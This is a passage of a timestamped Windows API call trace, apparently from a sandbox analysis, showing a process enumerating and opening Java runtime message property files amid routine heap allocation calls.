(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.858] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.858] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.859] AreFileApisANSI () returned 1 [0094.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0094.859] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties") returned 69 [0094.859] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_de.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcea)) returned 1 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0094.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.859] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.859] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe10, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages_es.properties", cAlternateFileName="MESSAG~3.PRO")) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0094.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0094.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0094.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0094.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0094.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0094.860] AreFileApisANSI () returned 1 [0094.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties", lpUsedDefaultChar=0x0) returned 69 [0094.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0094.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0094.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.860] AreFileApisANSI () returned 1 [0094.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ace8 [0094.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8ace8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 69 [0094.860] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.861] GetFileType (hFile=0x368) returned 0x1 [0094.861] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0094.861] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.861] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.861] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.862] CloseHandle (hObject=0x368) returned 1 [0094.862] AreFileApisANSI () returned 1 [0094.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0094.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 69 [0094.862] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.862] GetFileType (hFile=0x368) returned 0x1 [0094.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0094.862] CloseHandle (hObject=0x368) returned 1 [0094.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.862] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.862] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.863] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0094.863] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.863] AreFileApisANSI () returned 1 [0094.863] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0094.864] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties") returned 69 [0094.864] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_es.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xe10)) returned 1 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0094.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.864] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.864] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd51, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages_fr.properties", cAlternateFileName="MESSAG~4.PRO")) returned 1 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0094.864] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0094.864] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ad80 [0094.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0094.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0094.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0094.865] AreFileApisANSI () returned 1 [0094.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties", lpUsedDefaultChar=0x0) returned 69 [0094.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0094.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.865] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0094.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0094.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0094.865] AreFileApisANSI () returned 1 [0094.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.865] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ad80 [0094.865] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8ad80, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 69 [0094.865] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.865] GetFileType (hFile=0x368) returned 0x1 [0094.865] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ad80 | out: hHeap=0x20000) returned 1 [0094.866] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0094.866] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0094.866] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0094.866] CloseHandle (hObject=0x368) returned 1 [0094.866] AreFileApisANSI () returned 1 [0094.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0094.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a6f8 [0094.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties") returned 69 [0094.866] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_fr.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0094.866] GetFileType (hFile=0x368) returned 0x1 [0094.866] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0094.867] CloseHandle (hObject=0x368) returned 1 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0094.867] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 